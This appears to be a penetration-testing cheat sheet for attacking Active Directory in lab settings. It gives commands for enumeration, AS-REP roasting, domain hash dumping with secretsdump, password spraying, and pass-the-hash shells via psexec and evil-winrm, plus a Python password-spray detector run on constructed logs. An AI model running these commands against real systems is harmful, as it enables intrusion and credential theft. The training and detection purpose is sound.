<p><strong><span style="font-size: 28px; background-color: rgb(65, 168, 95);">Active Directory Attacking Methodology</span></strong></p>
<p><br></p>
<p>======================================================================</p>
<a href="hackad.html" style="color: blue; font-size: 20px;">
<button style="background-color: orange; padding: 15px 30px; font-size: 22px; height: 100px; width: 200px;">AD Hacking Roadmap</button>
</a>
<p>======================================================================</p>
<p><span style="font-size: 22px;"><strong><span style="background-color: rgb(84, 172, 210);">Website for help:</span></strong> </span><a href="https://wadcoms.github.io/"><span style="font-size: 30px;">https://wadcoms.github.io/</span></a></p>
<p><span style="font-size: 26px;"><span style="background-color: rgb(251, 160, 38);"><strong>Detailed Information</strong>:</span> <a href="https://navkang.github.io/Doozy/winprivesc2.html">https://navkang.github.io/Doozy/winprivesc2.html</a></span></p>
<p><span style="font-size: 30px; color: rgb(65, 168, 95);">-------------------------------------------------------------------------------------</span></p>
<p><span style="font-size: 22px; font-family: Helvetica; color: rgb(85, 57, 130);"><strong>Port 53 open: (zone transfer)</strong></span></p>
<p><span style="font-size: 22px; font-family: Helvetica; color: rgb(0, 0, 0);">dig axfr @10.10.10.10 local.htb</span></p>
<p><span style="font-size: 22px; font-family: Helvetica; color: rgb(0, 0, 0);">dig axfr @10.10.10.10 local-bank.local</span></p>
<p><span style="font-size: 30px; color: rgb(65, 168, 95);"><strong>-------------------------------------------------------------------------------------</strong></span></p>
<p><span style="font-size: 28px;"><span style="font-size: 22px; color: rgb(184, 49, 47);"><strong>Ports 135,139 and 445 open: (shares, comp and domain info, users)</strong></span></span></p>
<p><span style="font-size: 28px;"><span style="font-size: 22px; font-family: Helvetica;">smbclient -L \\\\&lt;ip&gt;\\</span></span></p>
<p><span style="font-size: 22px; font-family: Helvetica;">smbclient \\\\&lt;ip&gt;\\&lt;sharename&gt;</span></p>
<p><span style="font-size: 22px; font-family: Helvetica;">smbclient -U &lt;username&gt; \\\\&lt;ip&gt;\\&lt;sharename&gt;</span></p>
<p><span style="font-size: 22px; font-family: Helvetica; color: rgb(243, 121, 52);">-----------------------------------------------------------</span></p>
<p><span style="font-size: 28px;"><span style="font-size: 22px; font-family: Helvetica;">smbmap -H &lt;ip&gt;</span></span></p>
<p><span style="font-size: 28px;"><span style="font-size: 22px; font-family: Helvetica;">smbmap -u user -p pass -H &lt;ip&gt;</span></span></p>
<p><span style="font-size: 18px;">(also try an empty username and password, i.e. -u "" -p "", to test for a null session)</span></p>
<p><span style="font-size: 28px;"><span style="font-size: 22px; font-family: Helvetica; color: rgb(251, 160, 38);">-----------------------------------------------------------</span></span></p>
<p><span style="font-size: 28px;"><span style="font-size: 22px; font-family: Helvetica;">rpcclient -U "" -N &lt;ip&gt;</span></span></p>
<p><span style="font-size: 28px;"><span style="font-size: 22px; font-family: Helvetica;"> - enumdomusers</span></span></p>
<p><span style="font-size: 28px;"><span style="font-size: 22px; font-family: Helvetica;"> - enumdomgroups</span></span></p>
<p><span style="font-size: 28px;"><span style="font-size: 22px; font-family: Helvetica;"> - queryuser &lt;RID&gt;</span></span></p>
<p><span style="font-size: 28px;"><span style="font-size: 22px; font-family: Helvetica; color: rgb(251, 160, 38);">----------------------------------------------------------</span></span></p>
<p><span style="font-size: 28px;"><span style="font-size: 22px; font-family: Helvetica;">crackmapexec smb &lt;ip&gt; -u '' -p ''</span></span></p>
<p><span style="font-size: 28px;"><span style="font-size: 30px; font-family: Helvetica; color: rgb(65, 168, 95);">-------------------------------------------------------------------------------------</span></span></p>
<p><span style="font-size: 28px;"><span style="font-size: 22px; font-family: Helvetica; color: rgb(243, 121, 52);"><strong>Port 389 open: (domain and users information)</strong></span></span></p>
<p><span style="font-size: 28px;"><span style="font-size: 22px; font-family: Helvetica; color: rgb(0, 0, 0);">LDAPsearch<font color="#f37934"><strong>:</strong></font></span></span></p>
<p><span style="text-align: inherit; font-size: 22px;">-x = simple (anonymous) bind, -b = base DN of the domain, -H = LDAP URI of the host</span></p>
<p><span style="text-align: inherit; font-size: 22px;">ldapsearch -x -H ldap://10.10.10.175 -s base namingcontexts (then when you have the domain)</span></p>
<p><span style="text-align: inherit; font-size: 22px;">ldapsearch -x -H ldap://10.10.10.175 -b 'DC=EGOTISTICAL-BANK,DC=LOCAL'</span></p>
<p><span style="font-size: 30px; color: rgb(65, 168, 95);">-------------------------------------------------------------------------------------</span></p>
<p><span style="font-size: 22px; font-family: Helvetica; color: rgb(65, 168, 95);"><strong>Kerberos port 88 open: (spraying for valid usernames)</strong></span></p>
<p><span style="font-size: 22px; font-family: Helvetica; color: rgb(0, 0, 0);">kerbrute userenum -d test.local &lt;username list&gt; --dc &lt;ip&gt;</span></p>
<p><span style="font-size: 22px; font-family: Helvetica; color: rgb(0, 0, 0);">kerbrute userenum -d test.local &lt;username list&gt;</span></p>
<p><span style="font-size: 30px; font-family: Helvetica; color: rgb(65, 168, 95);">-------------------------------------------------------------------------------------</span></p>
<p><span style="font-size: 22px; font-family: Helvetica; color: rgb(0, 0, 0);"><strong><span style="background-color: rgb(226, 80, 65);">Other tools &amp; purpose:</span></strong></span></p>
<p><span style="font-size: 22px; font-family: Helvetica; color: rgb(0, 0, 0);"><strong>GetNPUsers.py (looks for vulnerable users, i.e. accounts with Kerberos pre-authentication disabled; needs a valid username list)</strong></span></p>
<p><span style="font-family: Helvetica; font-size: 22px; text-align: inherit;">python3 GetNPUsers.py test.local/ -dc-ip 10.10.10.1 -usersfile usernames.txt -format hashcat -outputfile hashes.txt</span></p>
<p><span style="font-family: Helvetica; font-size: 22px; text-align: inherit; color: rgb(251, 160, 38);">-----------------------------------------------------------</span></p>
<p><span style="font-family: Helvetica; font-size: 22px; text-align: inherit;"><strong>Secretsdump.py (dump hashes)</strong></span></p>
<p><span style="font-size: 22px; font-family: Helvetica;">secretsdump.py -just-dc-ntlm &lt;domain&gt;/&lt;username&gt;@&lt;ip&gt;</span></p>
<p><span style="font-size: 22px; font-family: Helvetica;"><span style="color: rgb(251, 160, 38);">----------------------------------------------------------</span></span></p>
<p><span style="font-size: 22px; font-family: Helvetica;"><span style="color: rgb(0, 0, 0);"><strong>password spraying:</strong></span></span></p>
<p><span style="font-size: 22px; font-family: Helvetica;"><span style="color: rgb(0, 0, 0);">crackmapexec smb &lt;ip&gt; -u user.list -p password --continue-on-success</span><br></span></p>
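<p><span style="font-size: 18px;">From the defender's side, the spray above (one password tried against a whole user list) leaves a characteristic trace: one source failing against many distinct accounts in a short window, with few attempts per account. The following detection logic is an added example, not part of the original cheat sheet; it runs over constructed sample log lines in a simplified "timestamp src= user= event=" shape (event 4625 = Windows failed logon, 4771 = Kerberos pre-authentication failure).</span></p>

```python
"""Detect password-spraying patterns in authentication logs.

A spray looks like ONE source failing against MANY distinct accounts within
a short window (the opposite of brute force, which hammers ONE account).
"""
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample log lines (not taken from any real system).
# Shape assumed here: "<ISO timestamp> src=<ip> user=<account> event=<id>"
SAMPLE_LOG = """\
2024-05-01T10:00:01 src=10.10.14.7 user=alice event=4625
2024-05-01T10:00:02 src=10.10.14.7 user=bob event=4625
2024-05-01T10:00:03 src=10.10.14.7 user=carol event=4771
2024-05-01T10:00:04 src=10.10.14.7 user=dave event=4625
2024-05-01T10:00:05 src=10.10.14.7 user=erin event=4625
2024-05-01T10:00:06 src=10.10.14.7 user=frank event=4625
2024-05-01T10:03:00 src=10.10.14.9 user=alice event=4625
2024-05-01T10:03:05 src=10.10.14.9 user=alice event=4625
2024-05-01T10:03:09 src=10.10.14.9 user=alice event=4625
2024-05-01T10:03:12 src=10.10.14.9 user=alice event=4625
"""

FAILED_LOGON_EVENTS = {"4625", "4771"}  # NTLM/interactive failure, Kerberos pre-auth failure


def parse_line(line):
    """Return (timestamp, src, user, event) for one log line."""
    ts, *fields = line.split()
    kv = dict(f.split("=", 1) for f in fields)
    return datetime.fromisoformat(ts), kv["src"], kv["user"], kv["event"]


def detect_spray(log_text, window=timedelta(minutes=5), min_users=5):
    """Return {src_ip: sorted distinct users} for every source that failed
    against at least `min_users` distinct accounts inside one `window`."""
    by_src = defaultdict(list)
    for line in log_text.splitlines():
        if not line.strip():
            continue
        ts, src, user, event = parse_line(line)
        if event in FAILED_LOGON_EVENTS:
            by_src[src].append((ts, user))
    hits = {}
    for src, events in by_src.items():
        events.sort()
        for i, (start, _) in enumerate(events):  # slide the window over each start
            users = {u for t, u in events[i:] if t - start <= window}
            if len(users) >= min_users:
                hits[src] = sorted(users)
                break
    return hits
```

The second source in the sample (four failures, all against alice) is a brute-force shape and is deliberately not flagged; tune `min_users` and `window` to the size of the directory being monitored.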
<p><span style="font-family: Helvetica; font-size: 22px; text-align: inherit; color: rgb(65, 168, 95);">---------------------------------------------------------------------------------------------------------------------</span></p>
<p><span style="font-family: Helvetica; font-size: 22px; text-align: inherit; background-color: rgb(250, 197, 28);"><strong>Connecting tools:</strong></span></p>
<p><span style="background-color: rgb(255, 255, 255); font-size: 22px; font-family: Helvetica;"><strong>PSEXEC:</strong></span></p>
<p><span style="background-color: rgb(255, 255, 255); font-size: 22px; font-family: Helvetica;">impacket-psexec &lt;domain&gt;/&lt;username&gt;:&lt;password&gt;@&lt;ip&gt;</span></p>
<p><span style="background-color: rgb(255, 255, 255); font-size: 22px; font-family: Helvetica;">impacket-psexec administrator@&lt;ip&gt; -hashes :&lt;NT hash&gt; (the format is LM:NT; only the second part, the NT hash, is needed)</span></p>
<p><span style="color: rgb(251, 160, 38); font-size: 22px;">------------------------------------------------------------</span></p>
<p><span style="background-color: rgb(255, 255, 255); font-size: 22px; font-family: Helvetica;"><strong>EVIL-WINRM:</strong></span></p>
<p><span style="background-color: rgb(255, 255, 255); font-size: 22px; font-family: Helvetica;">evil-winrm -i &lt;ip&gt; -u user -p pass</span></p>
<p><span style="background-color: rgb(255, 255, 255); font-size: 22px; font-family: Helvetica; color: rgb(251, 160, 38);">-----------------------------------------------------------</span></p>
<p><span style="background-color: rgb(255, 255, 255); font-size: 22px; font-family: Helvetica;"><strong>CRACKMAPEXEC:</strong></span></p>
<p><span style="background-color: rgb(255, 255, 255); font-size: 22px; font-family: Helvetica;">crackmapexec smb 10.129.79.75 -u user -p pass</span></p>
<p><span style="background-color: rgb(255, 255, 255); font-size: 22px; font-family: Helvetica;">(other protocols are supported too, e.g. winrm can be used in place of smb)</span></p>